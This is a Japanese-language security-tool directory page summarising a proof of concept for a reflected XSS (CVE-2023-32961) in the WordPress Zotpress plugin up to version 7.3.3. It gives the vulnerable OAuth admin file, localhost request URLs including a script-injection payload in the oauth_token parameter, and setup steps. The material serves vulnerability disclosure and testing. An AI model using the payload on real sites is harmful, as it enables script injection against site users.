Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-32961 — CVE-2023-32961 の PoC | Kitploit
ツール/GitHubGitHub/lourc0d3/cve-2023-32961
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

CVE-2023-32961 の PoC

リポジトリを見る
2113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-32961

このリポジトリは、WordPress ZotpressプラグインにおけるXSS脆弱性に関するものです。

コンポーネントの詳細


コンポーネント名

Zotpress

脆弱性のあるバージョン

≤ 7.3.3

コンポーネントスラッグ

zotpress

コンポーネントリンク

https://wordpress.org/plugins/zotpress/

前提条件


認証なし

脆弱性の詳細


簡単な説明

zotpress/lib/admin/admin.accounts.oauth.php 内の get_request_token 関数は、XSS攻撃に対して脆弱です。

再現方法(PoC)

ツールをダウンロード
  1. oauth PHP拡張をインストールして脆弱性をトリガーします。(これはZotpressのオプションです)
  2. zotero.org にログインします。
  3. get_request_token 関数が実行される条件を満たす必要があります。(初回のみ) 次のようなペイロードを送信します: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. 以下のペイロードを送信します http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

追加情報

  • zotero.org のアカウントが必要です。

  • トリガーするにはoauthStateの値を1に設定する必要があります。上記のペイロードが機能しない場合は、oauthStateを1に設定する方法を見つける必要があります。

    • 条件式 :

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • php oauth拡張の簡単なインストール方法:

    • ワンライナーコマンド :

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • wordpress:latest Dockerイメージでテスト済み。

PoC ビデオ

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

参考文献


CVE-2023-32961